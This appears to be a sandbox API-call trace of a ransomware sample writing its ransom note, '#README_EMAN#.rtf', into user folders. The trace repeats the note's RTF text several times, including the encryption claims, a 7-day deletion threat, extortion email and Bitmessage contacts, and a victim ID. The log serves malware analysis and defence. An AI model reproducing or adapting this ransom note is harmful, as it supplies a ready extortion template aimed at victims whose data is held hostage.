n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.575] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.575] CloseHandle (hObject=0x2f0) returned 1 [0286.576] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\#readme_eman#.rtf")) returned 0xffffffff [0286.576] GetLastError () returned 0x2 [0286.576] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 